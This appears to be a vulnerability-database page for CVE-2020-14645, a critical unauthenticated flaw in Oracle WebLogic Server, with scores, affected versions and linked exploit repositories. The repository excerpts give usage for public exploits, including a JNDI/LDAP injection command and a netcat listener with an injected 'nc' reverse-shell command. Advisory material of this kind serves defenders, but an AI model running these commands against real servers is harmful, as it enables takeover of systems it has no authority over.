7.5
CVSSv2

CVE-2020-14645

Published: 15/07/2020 Updated: 20/07/2020
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle weblogic server 10.3.6.0.0

oracle weblogic server 12.1.3.0.0

oracle weblogic server 12.2.1.3.0

oracle weblogic server 12.2.1.4.0

oracle weblogic server 14.1.1.0.0

Github Repositories

CVE-2020-14645 使用方法 首先使用NDI-Injection-Exploit监听,并生成一个ldap地址。 java -jar WeblogicT3jar -Target 127001 -Port [7001] -RMI ldap://127001:1389/dozvtq [--SSL] -Tatget 和-RMI必填,https可使用--SSL参数,-Port默认7001。 自行编译需要添加coherencejar和wlfullclientjar 漏洞参考: mpweixinqqcom/s?__biz=MzUyMD

Weblogic Server CVE-2020-14645 EXP for Python (complete in one step)

CVE-2020-14645 Weblogic Server CVE-2020-14645 EXP for Python (complete in one step) Useage: Python3 exploitpy -t <tartget IP> -c <command> tips: No echo Example: nc -lvnp 4444 Python3 exploitpy -t 192168014 -c 'nc 192168015 4444' then you will getshell

Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData()

CVE-2020-14645 Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData() Project depends on githubcom/5up3rc/weblogic_cmd Demo Require JDK Version < JDK6u211/7u201/8u191 Weblogic Version 122140 Do not use illegally!!!!!!!! Reference wwwanquankecom/post/id/210724 githubcom/5up3rc/weblogic_cmd Thanks @Smi1e @MitAh